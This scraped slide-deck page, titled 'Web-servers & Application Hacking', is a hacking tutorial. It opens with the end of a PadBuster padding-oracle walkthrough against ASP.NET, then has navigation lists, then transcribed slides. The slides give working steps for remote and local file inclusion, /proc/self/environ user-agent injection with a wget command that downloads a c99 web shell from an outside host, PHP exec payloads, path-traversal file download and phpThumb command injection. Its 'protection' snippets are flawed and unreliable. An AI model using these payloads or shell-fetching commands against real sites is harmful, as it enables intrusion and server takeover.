A8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0 Attempt 4561 - Status: 200 - Content Length: 360 http://www.myapp.com/ScriptResource.axd?d=4AA4AAAAAAAAAAAAAAAA AA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0 Attempt 4792 - Status: 200 - Content Length: 100277 http://www.myapp.com/ScriptResource.axd?d=xwA5AAAAAAAAAAAAAAAA AA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0 Attempt 5353 - Status: 200 - Content Length: 359 http://www.myapp.com/ScriptResource.axd?d=BAA6AAAAAAAAAAAAAAAA AA8AKxtNMQoQQxBBBBVqZAJ2R8LhDGgKEb9nsHoH-jVA0 As you can imagine, it’s difficult to tell whether these responses contain anything meaningful based solely on the data that is printed to the screen. In the caseof this exploit, we know that the web.config file is likely going to be much larger than the small T-Block responses which average around 500 Bytes. You can actually see that in the excerpt above, attempt number 4792 shows a much larger content length...this is the responsethat contains the web.config file. The inclusion of unwanted T-Block responses in our output is a result of our desire to maintain PadBuster as a universal toolthat is not specific to a particular vulnerability such as this one. You may also have noticed that our original command made use of another new option (-log). The "log" option tells PadBuster to log various output files in an automatically generated folder using the PadBuster.DDMMYY-TIME naming convention. This option is critical for use in brute force mode, since each matching responseis logged to this folder and can be easily reviewed to determine whether the brute force attempt worked. Forthe caseof a web.config download exploit, I recommend running the above command and monitoring the output folder to determine when a significantly larger responsefile gets created. Bypassing the Workarounds Now that you've seen how to retrieve the web.config, let’s go back to an alternate technique for using ScriptResource.axd as a padding oracle. As I mentioned previously, this technique works despite implementing therecommended workarounds initially presented by Microsoft in their guidance preceding the patch release. To start, you'll need a valid ciphertext sample. The sample, however, does
not have to be valid for the script resource handler (it can be taken from any Framework component...mosteasily from the WebResource.axd query string). Step 1: Find a valid T-Block Request Using the obtained sample, along with the -bruteforce option, the following command can be used to quickly brute force a valid T-Block. The following example assumes that we were able to obtain a valid "d" value from a link to the web resource handler (/WebResource.axd?d=qmZbysenet6VGS94Ord8gQ2&t=633768217780468750). padBuster.pl http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2 qmZbysene t6VGS94Ord8gQ2 16 -encoding 3 -bruteforce Once you run PadBuster with these options, and select the default error pattern, you should get a 200 responsewithin the first few hundred requests similar to the one shown below: Attempt 60 - Status: 200 - Content Length: 337 http://www.myapp.com/ScriptResource.axd?d=OwAAAAAAAAAAAAAAAAA AAKpmW8rHp3relRkveDq3fIE1 Step 2: Use the obtained T-Block with the -prefix option Now you can leverage the obtained T-Block request, along with the -prefix option, to use the script resource handler as a padding oracle as shown below. padBuster.pl http://www.myapp.com/ScriptResource.axd?d=qmZbysenet6VGS94Ord8gQ2 qmZbysene t6VGS94Ord8gQ2 16 -encoding 3 -noiv -prefix OwAAAAAAAAAAAAAAAAAAAKpmW8rHp3relRkveDq3fIE1 The examples above hopefully demonstrate how to use the new features of PadBuster for performing various exploits against the .NET framework. Our plan is to add more features to PadBuster where they make sense, specifically features that can be useful in against a wide variety of padding oracle attack vectors. As always, send us your feedback, modifications, bug reports, or general comments so that we can incorporate them into future versions.
Web-servers & Application Hacking

More Related Content

PPT
Application Security
byReggie Niccolo Santos
 
PPTX
Threat Hunting with Splunk Hands-on
bySplunk
 
PPT
How to hack wireless internet connections using aircrack-ng
byOpen Knowledge Nepal
 
PDF
Cross site scripting
byn|u - The Open Security Community
 
PPTX
Ethical hacking - Footprinting.pptx
byNargis Parveen
 
PPTX
Web application attacks
byhruth
 
PPTX
Web security
byPadam Banthia
 
PPTX
Recon with Nmap
byOWASP Delhi
 
Application Security
byReggie Niccolo Santos
 
Threat Hunting with Splunk Hands-on
bySplunk
 
How to hack wireless internet connections using aircrack-ng
byOpen Knowledge Nepal
 
Cross site scripting
byn|u - The Open Security Community
 
Ethical hacking - Footprinting.pptx
byNargis Parveen
 
Web application attacks
byhruth
 
Web security
byPadam Banthia
 
Recon with Nmap
byOWASP Delhi
 

What's hot

PDF
CSRF Basics
byn|u - The Open Security Community
 
PPTX
Bug Bounty 101
byShahee Mirza
 
PDF
Ch 10: Hacking Web Servers
bySam Bowne
 
PPT
Intro to Web Application Security
byRob Ragan
 
PDF
INCIDENT RESPONSE NIST IMPLEMENTATION
bySylvain Martinez
 
PPTX
Xss attack
byManjushree Mashal
 
PPSX
Web security
bykareem zock
 
PPTX
Cryptography for Absolute Beginners (May 2019)
bySvetlin Nakov
 
PDF
DNS & DNSSEC
byAPNIC
 
PDF
DNS Attacks
byHimanshu Prabhakar
 
PDF
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
byMITRE ATT&CK
 
PPTX
Command injection
bypenetration Tester
 
PDF
Advanced Wi-Fi pentesting
byYunfei Yang
 
PPTX
Network security - Basic concepts
byKhoa Nguyen
 
PPTX
Threat Hunting Web Shells Using Splunk
byjamesmbower
 
PPTX
Understanding Cross-site Request Forgery
byDaniel Miessler
 
PPTX
Footprinting and reconnaissance
byNishaYadav177
 
PPTX
Rest API Security
byStormpath
 
PPTX
Computer virus and worms
byrishi ram khanal
 
PDF
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...
byEdureka!
 
CSRF Basics
byn|u - The Open Security Community
 
Bug Bounty 101
byShahee Mirza
 
Ch 10: Hacking Web Servers
bySam Bowne
 
Intro to Web Application Security
byRob Ragan
 
INCIDENT RESPONSE NIST IMPLEMENTATION
bySylvain Martinez
 
Xss attack
byManjushree Mashal
 
Web security
bykareem zock
 
Cryptography for Absolute Beginners (May 2019)
bySvetlin Nakov
 
DNS & DNSSEC
byAPNIC
 
DNS Attacks
byHimanshu Prabhakar
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
byMITRE ATT&CK
 
Command injection
bypenetration Tester
 
Advanced Wi-Fi pentesting
byYunfei Yang
 
Network security - Basic concepts
byKhoa Nguyen
 
Threat Hunting Web Shells Using Splunk
byjamesmbower
 
Understanding Cross-site Request Forgery
byDaniel Miessler
 
Footprinting and reconnaissance
byNishaYadav177
 
Rest API Security
byStormpath
 
Computer virus and worms
byrishi ram khanal
 
Cybersecurity Fundamentals | Understanding Cybersecurity Basics | Cybersecuri...
byEdureka!
 

Viewers also liked

PDF
Solaris 11 network virtualization & Server Virtualization for cloud
bysuk kim
 
PDF
Hacking in shadows By - Raghav Bisht
byRaghav Bisht
 
DOCX
Antivirus Bypass Techniques - 2016
byRaghav Bisht
 
PPTX
Google Dorks and SQL Injection
byMudassir Hassan Khan
 
DOC
Php
byLinh Tran
 
PPTX
Assistive technology
byk4yl4hamilton
 
TXT
Havij dork
byiyusrusnadi
 
PPTX
Võrtsjärve ökosüsteem
byKatiK
 
PPTX
Mime sniffing
byRonan Dunne, CEH, SSCP
 
PPTX
Ethical Hacking Services
byVirtue Security
 
PPTX
Inteligencia artificial
byPachaqueen2015
 
DOCX
Ceh certified ethical hacker
byGrowmind Solutions
 
ODP
Hostile Subdomain Takeover by Ankit Prateek
byOWASP Delhi
 
PPTX
ELECTRONIC VOTING MACHINE(EVM) HACKABLE OR NOT
bySHUBHAM SAHU
 
PDF
Windows Registry Tips & Tricks
byRaghav Bisht
 
PPTX
Google Dorks
byAdhoura Academy
 
PDF
ccna practical notes
byRaghav Bisht
 
PPTX
Metasploit For Beginners
byRamnath Shenoy
 
ZIP
Dr.Repi
byDriton Haliti
 
PDF
Thwarting The Surveillance in Online Communication by Adhokshaj Mishra
byOWASP Delhi
 
Solaris 11 network virtualization & Server Virtualization for cloud
bysuk kim
 
Hacking in shadows By - Raghav Bisht
byRaghav Bisht
 
Antivirus Bypass Techniques - 2016
byRaghav Bisht
 
Google Dorks and SQL Injection
byMudassir Hassan Khan
 
Php
byLinh Tran
 
Assistive technology
byk4yl4hamilton
 
Havij dork
byiyusrusnadi
 
Võrtsjärve ökosüsteem
byKatiK
 
Mime sniffing
byRonan Dunne, CEH, SSCP
 
Ethical Hacking Services
byVirtue Security
 
Inteligencia artificial
byPachaqueen2015
 
Ceh certified ethical hacker
byGrowmind Solutions
 
Hostile Subdomain Takeover by Ankit Prateek
byOWASP Delhi
 
ELECTRONIC VOTING MACHINE(EVM) HACKABLE OR NOT
bySHUBHAM SAHU
 
Windows Registry Tips & Tricks
byRaghav Bisht
 
Google Dorks
byAdhoura Academy
 
ccna practical notes
byRaghav Bisht
 
Metasploit For Beginners
byRamnath Shenoy
 
Dr.Repi
byDriton Haliti
 
Thwarting The Surveillance in Online Communication by Adhokshaj Mishra
byOWASP Delhi
 

Similar to Web-servers & Application Hacking

PDF
LFI to RCE
byn|u - The Open Security Community
 
PDF
Php vulnerability presentation
bySqa Enthusiast
 
PDF
LFI to RCE Exploit with Perl Script
byPrathan Phongthiproek
 
PPTX
File inclusion
byAaftabKhan14
 
PDF
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
byIsmail Tasdelen
 
ODP
How secure is your code?
byMikee Franklin
 
PDF
LFI
byМихаил Фирстов
 
DOCX
Continuing in your role as a human service provider for your local.docx
byrichardnorman90310
 
PDF
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
bySandro Zaccarini
 
PDF
Local File Inclusion to Remote Code Execution
byn|u - The Open Security Community
 
PPTX
An introduction to php shells
byRichieSM
 
PPTX
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
byEC-Council
 
PPTX
Prevent hacking
byViswanath Polaki
 
PDF
CNIT 129S: 10: Attacking Back-End Components
bySam Bowne
 
PPTX
Secure PHP Coding - Part 1
byVinoth Kumar
 
PDF
Teaching Your WAF New Tricks
byRobert Rowley
 
PDF
Art of Web Backdoor - Pichaya Morimoto
byPichaya Morimoto
 
PPT
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
byZack Meyers
 
PDF
File Inclusion.pdf
byOkan YILDIZ
 
PDF
Web Application Penetration Testing.pdf
bybarayapaten
 
LFI to RCE
byn|u - The Open Security Community
 
Php vulnerability presentation
bySqa Enthusiast
 
LFI to RCE Exploit with Perl Script
byPrathan Phongthiproek
 
File inclusion
byAaftabKhan14
 
Remote File Inclusion / Local File Inclusion [Attack and Defense Techniques]
byIsmail Tasdelen
 
How secure is your code?
byMikee Franklin
 
LFI
byМихаил Фирстов
 
Continuing in your role as a human service provider for your local.docx
byrichardnorman90310
 
Pentesting an unfriendly environment: bypassing (un)common defences and mate ...
bySandro Zaccarini
 
Local File Inclusion to Remote Code Execution
byn|u - The Open Security Community
 
An introduction to php shells
byRichieSM
 
TakeDownCon Rocket City: WebShells by Adrian Crenshaw
byEC-Council
 
Prevent hacking
byViswanath Polaki
 
CNIT 129S: 10: Attacking Back-End Components
bySam Bowne
 
Secure PHP Coding - Part 1
byVinoth Kumar
 
Teaching Your WAF New Tricks
byRobert Rowley
 
Art of Web Backdoor - Pichaya Morimoto
byPichaya Morimoto
 
Bsides-Philly-2016-Finding-A-Companys-BreakPoint
byZack Meyers
 
File Inclusion.pdf
byOkan YILDIZ
 
Web Application Penetration Testing.pdf
bybarayapaten
 

More from Raghav Bisht

PPTX
OSINT - Yandex Search
byRaghav Bisht
 
PPTX
OSINT - Twitter Searches
byRaghav Bisht
 
PPTX
OSINT Tool - Reconnaissance with Recon-ng
byRaghav Bisht
 
PPTX
OSINT Tool - Reconnaissance with Maltego
byRaghav Bisht
 
PPTX
OSINT - Linkedin Search Slides
byRaghav Bisht
 
PPTX
OSINT - Facebook Searches
byRaghav Bisht
 
PPTX
Osint - Dark side of Internet
byRaghav Bisht
 
PDF
Intrusion Detection System Project Report
byRaghav Bisht
 
DOCX
Ethical Hacking (CEH) - Industrial Training Report
byRaghav Bisht
 
PPTX
Sql injection attack
byRaghav Bisht
 
PPTX
Os Command Injection Attack
byRaghav Bisht
 
PPTX
Introduction To Vulnerability Assessment & Penetration Testing
byRaghav Bisht
 
PPTX
Introduction To Exploitation & Metasploit
byRaghav Bisht
 
PPTX
Introduction To Ethical Hacking
byRaghav Bisht
 
PPTX
Directory Traversal & File Inclusion Attacks
byRaghav Bisht
 
PPTX
Introduction To Hacking
byRaghav Bisht
 
OSINT - Yandex Search
byRaghav Bisht
 
OSINT - Twitter Searches
byRaghav Bisht
 
OSINT Tool - Reconnaissance with Recon-ng
byRaghav Bisht
 
OSINT Tool - Reconnaissance with Maltego
byRaghav Bisht
 
OSINT - Linkedin Search Slides
byRaghav Bisht
 
OSINT - Facebook Searches
byRaghav Bisht
 
Osint - Dark side of Internet
byRaghav Bisht
 
Intrusion Detection System Project Report
byRaghav Bisht
 
Ethical Hacking (CEH) - Industrial Training Report
byRaghav Bisht
 
Sql injection attack
byRaghav Bisht
 
Os Command Injection Attack
byRaghav Bisht
 
Introduction To Vulnerability Assessment & Penetration Testing
byRaghav Bisht
 
Introduction To Exploitation & Metasploit
byRaghav Bisht
 
Introduction To Ethical Hacking
byRaghav Bisht
 
Directory Traversal & File Inclusion Attacks
byRaghav Bisht
 
Introduction To Hacking
byRaghav Bisht
 

Recently uploaded

PDF
Ethical Initiatives in AI and accountability.pdf
byShiwani Gupta
 
PDF
Unlocking Full-Stack Observability for AIOps: A Precisely Ironstream for Big ...
byPrecisely
 
PDF
2025 October Patch Tuesday
byIvanti
 
PDF
Meta and Apple close to settling EU cases.pdf
byLUMINATIVE MEDIA/PROJECT COUNSEL MEDIA GROUP
 
PPTX
"Daily workflows with Cursor IDE", Maksym Anisimov
byFwdays
 
PDF
Expert Python App Development Company for Modern Enterprises
bySynapseIndia
 
PDF
UnityNet Digital Sovereignty Checklist 2025-10-13
byLHelferty
 
PDF
Fairness and Bias in AI Ethics and Explainability
byShiwani Gupta
 
PDF
Agentic AI Guide for Enterprise Use-cases
byDebmalya Biswas
 
PPTX
"The Art of Web Scraping: Tree Algorithms and JS Magic", Dmytro Tarasenko
byFwdays
 
PDF
AGV PROTOCOL BRAND KIT COMPLETE VIEW.pdf
byfagbolade
 
PPTX
Top Trends in Kubernetes Security: TalosCon 2025
byCheryl Hung
 
PDF
Data Structure - 12 Graph
byAndiNurkholis1
 
PDF
Combining AI with Red Teaming and Bug Bounty
byRamin Farajpour Cami
 
PPTX
BioVault.net ADW 2025 CODATA: SyftBox: a General Purpose Solution for Data Vi...
byMadhava Jay
 
PDF
Planetek Italia Corporate Profile brochure
byPlanetek Italia Srl
 
PDF
From Data Chaos to Copilot Confidence: A Step-by-Step Microsoft 365 Copilot R...
byNikki Chapple
 
PDF
Dragino商品カタログ 2025.7 LoRaWAN・NB-IoT・LTE-M(LTE Cat.M1)対応センサーリスト
byCRI Japan, Inc.
 
PDF
Beyond Generative AI: Creating Demand for Compute in the 2030s
byReidar Wasenius
 
PDF
Session 2 - Agentic Orchestration with UiPath Maestro
byDianaGray10
 
Ethical Initiatives in AI and accountability.pdf
byShiwani Gupta
 
Unlocking Full-Stack Observability for AIOps: A Precisely Ironstream for Big ...
byPrecisely
 
2025 October Patch Tuesday
byIvanti
 
Meta and Apple close to settling EU cases.pdf
byLUMINATIVE MEDIA/PROJECT COUNSEL MEDIA GROUP
 
"Daily workflows with Cursor IDE", Maksym Anisimov
byFwdays
 
Expert Python App Development Company for Modern Enterprises
bySynapseIndia
 
UnityNet Digital Sovereignty Checklist 2025-10-13
byLHelferty
 
Fairness and Bias in AI Ethics and Explainability
byShiwani Gupta
 
Agentic AI Guide for Enterprise Use-cases
byDebmalya Biswas
 
"The Art of Web Scraping: Tree Algorithms and JS Magic", Dmytro Tarasenko
byFwdays
 
AGV PROTOCOL BRAND KIT COMPLETE VIEW.pdf
byfagbolade
 
Top Trends in Kubernetes Security: TalosCon 2025
byCheryl Hung
 
Data Structure - 12 Graph
byAndiNurkholis1
 
Combining AI with Red Teaming and Bug Bounty
byRamin Farajpour Cami
 
BioVault.net ADW 2025 CODATA: SyftBox: a General Purpose Solution for Data Vi...
byMadhava Jay
 
Planetek Italia Corporate Profile brochure
byPlanetek Italia Srl
 
From Data Chaos to Copilot Confidence: A Step-by-Step Microsoft 365 Copilot R...
byNikki Chapple
 
Dragino商品カタログ 2025.7 LoRaWAN・NB-IoT・LTE-M(LTE Cat.M1)対応センサーリスト
byCRI Japan, Inc.
 
Beyond Generative AI: Creating Demand for Compute in the 2030s
byReidar Wasenius
 
Session 2 - Agentic Orchestration with UiPath Maestro
byDianaGray10
 
In this document
Powered by AI

Introduction to web servers and application hacking focusing on methodologies.

Comprehensive tutorial on web-hacking methods such as RFI, LFI, SQL Injection, and more.

Explanation of RFI vulnerabilities, how to exploit them, and methods for protection.

Discusses LFI vulnerabilities, exploitation techniques, and methods for checking site vulnerabilities.

Step-by-step guide on exploiting LFI to gain remote code execution and upload shells.

Detailed techniques for LFI exploitation via browser tools and environment setup.

Explains LFD vulnerability methods, exploitation, and protective measures.Describes FPD and its utility in attacks, along with protective measures.Detailed insights into exploiting command or SQL injection vulnerabilities.

Overview of XSS, types, and development of XSS proof-of-concept attacks.

Guidelines for various server bypass techniques including symlink, and web server configurations.Detailed guidance on exploiting WebDAV services for server access.

Various SQL injection cheat sheets for enumerating databases across multiple DB platforms.

Techniques for exploiting specific database vulnerabilities and background on possible SQL injection attacks.

Step-by-step methods to exploit vulnerabilities in WordPress including SQL injection.

Web-servers & Application Hacking

  • 1.
  • 2.
    Part 1 Web-hacking Attacks Thisis a tutorial about web-hacking methods that I and many other hackers have collected. I thought that many people would learn a lot from this here. Guide content :  Remote file inclusion  Localfile inclusion  LFI 2 RCE  LFI 2 RCE Using Firefox  Localfile download  Full path disclosure  CommandInjectionVulnerability Exploit  SQL Injection - with load file  MSSQLInjection  Blind SQL Injection  Postgre SQLInjection  Error based Postgre SQLInjection  SQL Injection on ASPX  Dot net nuke  XSS  CRLF  CSRF  Server Side Includes | Server Side Inclusion  Symlink Attack  Sql injection String & Union based  Xpath Injection  LDAP Injection  DNS Zone TransferVulnerability Exploit  Oracle Padding Attack Using Brup Suite
  • 3.
    So let’s getstarted ! Remote file inclusion : 1) RFI RFI (Remote File Inclusion) is type of web-hacking. It occurs when the PHP script uses functions include () to include some files for a GET method. This file is usually in txt format pages whose content is printed. Example: Code: http://www.site.com/index.php?page=home Now a days RFI is rarely in use and all you need to use it on some vulnerable site is shell in txt format. 2) Vulnerable script Code: <?php $page = $_GET['page']; include($page); ?> 3) Exploiting vulnerability We have site: Code: http://www.site.com/index.php?page=home Now instead of home we gonna use our shell. So we get: Code: http://www.site.com/index.php?page=www.shell-link.com/shell.txt? If site is vulnerable it should show shell with list of files from site you are attacking. 4) Null byte bypass In some scripts there is a weak protection which is gonna include file and add html extension, or some other: Code: <?php $page = $_GET['page']; include($page.".html"); ?> In that case we are going to use null byte bypass(%00). Everything after %00 would not count and use. We are also using %00 for picture upload bypass as php, but I am not going to talk about it.
  • 4.
    So link shouldlook like this: Code: http://www.site.com/index.php?page=www.shell-link.com/shell.txt?%00 5) Protection script Script should look like this: Code: <?php $page = $_GET['page']; include($page); ?> So we are going to add some stuff to protect it: Code: <?php $page = $_GET['page']; if(file_exists("pages/".$page) { include($page); } ?>
  • 5.
    Local file inclusion: 1) LFI? LFI can be used on sites like: Code: http://link.com/index.php?page= by adding Code: ../../../../../../etc/passwd (sometimes you have to add %00 on passwd). 2) Finding vulnerable sites: Code: index.php?page= index.php?option= search.php?word= 3) Checking site vulnerability: Find some site and use Code: ../../../../../../../../../../../etc/passwd or Code: ../../../../../../../../../../../etc/passwd%00 When you enter this to link you get this: Code: root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh www-data:x:33:33:www-data:/var/www:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh libuuid:x:100:101::/var/lib/libuuid:/bin/sh Debian- exim:x:101:103::/var/spool/exim4:/bin/false statd:x:102:65534::/var/lib/nfs:/bin/false ntp:x:103:106::/home/ntp:/bin/false snmp:x:104:65534::/var/lib/snmp:/bin/false sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin which means that site is vulnerable. 4) proc/self/environ Now we want to see if we have access in /proc/self/environ over site so we can upload a shell on the site.
  • 6.
    Instead of etc/passwd%00we are going to put /proc/self/environ If page prints this: Code: DOCUMENT_ROOT=/home/sirgod/public_html GATEWAY_INTERFACE=CGI/1.1 HTTP_ACCEPT=text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1 HTTP_COOKIE=PHPSESSID=134cc7261b341231b9594844ac2a d7ac HTTP_HOST=www.website.com HTTP_REFERER=http://www.website.com/etc/passwd HTTP_USER_AGENT=Opera/9.80 (Windows NT 5.1; U; en) Presto/2.2.15 Version/10.00 PATH=/bin:/usr/bin QUERY_STRING=view=..%2F..%2F..%2F..%2F..%2F..%2Fpr oc%2Fself%2Fenviron REDIRECT_STATUS=200 REMOTE_ADDR=6x.1xx.4x.1xx REMOTE_PORT=35665 REQUEST_METHOD=GET REQUEST_URI=/index.php?view=..%2F..%2F..%2F..%2F..%2F..%2Fproc% 2Fself%2Fenviron SCRIPT_FILENAME=/home/sirgod/public_html/index.php SCRIPT_NAME=/index.php SERVER_ADDR=1xx.1xx.1xx.6x SERVER_ADMIN=webmaster**website.com SERVER_NAME=www.website.com SERVER_PORT=80 SERVER_PROTOCOL=HTTP/1.0 SERVER_SIGNATURE= Apache/1.3.37 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 Serv.......... then proc/self/environ is enabled so we can upload the shell. 5) Shell uploading To upload the shell we need Mozilla Firefox: Code: http://www.mozilla.com/firefox/ Add-on Tamper Data: Code: https://addons.mozilla.org/en-US/firefox/addon/tamper-data/ Open site etc: Code: http://www.site.com/index.php?lien=../../../../../../../../../../../../proc/s elf/environ Tools > Tamper Data click Start Tamper then refresh page and in user agent put next code: Code: <?system('wget www.link.com/shell.txt -O shell.php');?> Click OK. To access shell use: Code:www.link.com/shell.php
  • 7.
    LFI 2 RCE Find LFI vulnerabel site.  Check its link.
  • 8.
     Do -> http://www.site.com/index.php?lien=../../../../../../../../../../../../pro c/self/environ Open command prompt and run script LFI2RCE.exe [C:lfi2rce.exe "< Website vuln link>"]
  • 9.
     Type Command-: id  Type Command -: uname -a  Type Command -: ls -l  Now Upload a "shell" in this web server so,  Type Command -: wget http://downlading-link-of-shell.com/c99.php or /c99.zip  Type Command -: unzip c99.txt.zip  Type Command -: mv c99.txt c99.php "OR" mv c99.txt Out14ws.php (where assuming "out14ws.php" is Public HTML page & move command will copy c99.txt Text to "opt14ws.php")  Type Command-: ls | grep Out14ws "OR " ls | grep c99  Type Command -: pwd [ To check present working directory of shell ]  Then open full link of your shell in yoyr web browse you get : http://website-name/path/path/c99.php http:// website-name/path/path/opt14ws.php.php
  • 11.
    LFI 2 RCEUsing Firefox  Check the target if it is vulnerable to lfi or not  Eg. http://www.site.com/index.php?page=../../../../../../../../etc/passwd -: or http://www.site.com/index.php?page=../../../../../../../../etc/passwd%00  Now. See -: http://www.site.com /index.php?page=../../../../../../proc/self/environ-: or http://www.site.com /index.php?page=../../../../../../proc/self/environ%00
  • 12.
     Now inaddress bar or firefox type : " about:config "  Find -: accessibility.browsewithcaret > rightclick > new > string  NEW STRING VALUE : general.useragent.override Press " Ok " new box will pop up ask for : ENTER STRING VALUE
  • 13.
     ENTER STRINGVALUE : <?php phpinfo(); ?> It is general.useragent.override After it u will see something like :
  • 14.
     Now checkthe php version and Information while refreshing the vulnerable link or page. Find disabled information -: disable_functions - system, passthru, shellexec, popen, escapshellcmd, proc_open etc...  Once u have checked the php info go to : " about:config " page and see for "general.useragent.override " and ENTER STRING VALUE :  <pre><?php exec('YOUR COMMAND',$result);foreach($result as $output){print "$outputn";}?></pre>  Behalf of - YOUR COMMAND - Type some command like - ls -a , uname -a, cd /etc/passwd, pwd, etc...  For uploading Shell You can type command : wget http://www.site.com/c99.php Note : after putting command for getting its output you have to refresh the page or vulnable link.
  • 15.
     Command -:ls -la  Output : On refreshing page
  • 16.
     Command :uname -a
  • 17.
    Local file download: 1) LFD? LFD (Local File Download) is vulnerability in script which is used to download files using GET method, but you can also use it with POST method using add-on Tamper Data. Code: http://site.com/download_file.php?file=notepad.exe 2) Vulnerable script Code: <?php if(isset($_POST['download'])) { $file = $_GET['file']; $file_info = pathinfo($file); header('Content-type: application/x-'.$file_info['extension']); header('Content-Disposition: attachment; filename='.$file_info['basename']); header('Content-Length: '.filesize($file)); readfile($file); exit; } ?> 3) Vulnerability check To check if script is vulnerable we are gonna try to download etc/passwd. So instead of: Code: http://site.com/download_file.php?file=notepad.exe We are gonna use: Code: http://site.com/download_file.php?file=../../../../../../../../../etc/passwd If it starts to download and if it open file in text editor it look something like this: Code: root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin Script is vulnerable! NOTE: If it is a windows server use boot.ini instead of etc/passwd. 4) Exploiting vulnerability Now when we know that script is vulnerable, we want to see which files are on host. You can do this on this way: Code: http://site.com/download_file.php?filel=../
  • 18.
    ../ is gonnaback us one directory backward and download file. 1.1 It is possible when it download file and open in text editor to print file list in directories. 1.2 or it is either possible to download file but when it is opened in text editor file is empty. In case 1.1 we dont have to guess file name and directory and we can download whatever we want. In case 1.2 we must guess file name and directory and we can download only files which name we guess. There is a few program that can help us to find files (Acunetix and HTTrack Website Copier). 5) Protection script We have script mentioned at start: Code: <?php if(isset($_POST['download'])) { $file = $_GET['file']; $file_info = pathinfo($file); header('Content-type: application/x-'.$file_info['extension']); header('Content-Disposition: attachment; filename='.$file_info['basename']); header('Content-Length: '.filesize($file)); readfile($file); exit; } ?> by adding if(file_exists("download/".$file) we are gonna secure script. So it should look like: Code: <?php if(isset($_POST['download'])) { $file = $_GET['file']; $file_info = pathinfo($file); if(file_exists("download/".$file)) { header('Content-type: application/x-'.$file_info['extension']); header('Content-Disposition: attachment; filename='.$file_info['basename']); header('Content-Length: '.filesize($file)); readfile($file); exit; }
  • 19.
    Full path disclosure: This method let you over errors in file or over errors made by programmers to let you see which files are in which directories, over it you can't directly hack site, it just let you help while hacking. It is useful because it can help you in faster and easier hacking, also it can help you with Local File Inclusion (LFI), when folder name is changed, or some other file. You can findout using FPD. There is a lot of ways using FPD vulnerability on site, I'll explane you 2 most important. 1st is over array, by adding square brackets on link like this one: Code: index.php?page=home To finish vulnerability attack is to add [] on destined place: Code: index.php?page[]=home. That will give you error like this: Code: Warning: include(blah/errors.php) [function.include]: failed to open stream: No such file or directory /home/insekure/public_html/index.php on line 211 From this you can see on site is it exists directory blah. 2nd method is to add most used cookie (Null Session Cookie), and you can add him by Java- injection, by adding java code on site you will get error. This is a javascript code: Code: javascript:void(document.cookie='PHPSESSID='); add that in your address bar and hit enter, now when page is refreshed you will get this error: Code: Warning: session_start() [function.session-start]: The session id contains illegal characters, valid characters are a-z, A-Z, 0-9 and '-,' in /home/example/public_html/thems/errors.php on line 58 then try to open directory thems on site, that should list you files in that directory. Protection: Most simple way to protect from this attacks is to turn-off error reporting. edit or add: Code: error_reporting(0);
  • 20.
    Command Injection VulnerabilityExploit  phpThumb()"fltr[]" Command Injection Vulnerability Exploit Scans  Automatic Shell upload I. phpThumb() "fltr[]" Command Injection Vulnetability since the 21th of December 2011 we’ve identified over 300 attempts to exploit the phpThumb() 'fltr[]' Parameter Command Injection Vulnerability aka CVE-2010-1598 reported back in April 2010. Input passed via the "fltr[]" parameter to phpThumb.php is not properly sanitized before being used in a command line argument. This can be exploited to inject and execute arbitrary shell commands via specially crafted requests. Successful exploitation requires that "ImageMagick" is installed. The vulnerability is confirmed in version 1.7.9. Other versions may also be affected. This vulnerability can be exploited with "high_security_enabled" set to "true" by brute forcing the "high_security_password". Source: phpThumb() "fltr[]" Command Injection Vulnerability By appending a semi-colon to the "blur" option of the fltr parameter, the attacker is able to execute OS level commands as there aren't any input validation checks for the $command data in phpthumb.functions.php. 00.function ImageMagickThumbnailToGD() { 01.... 02.foreach ($this->fltr as $filterkey => $filtercommand) { 03.@list($command, $parameter) = explode('|', $filtercommand, 2); 04.switch ($command) { 05.... 06.case 'blur': 07.if ($this->ImageMagickSwitchAvailable('blur')) { 08.@list($radius) = explode('|', $parameter); 09.$radius = ($radius ? $radius : 1); 10.$commandline .= ' -blur '.$radius; 11.unset($this->fltr[$filterkey]); 12.} 13.break;
  • 21.
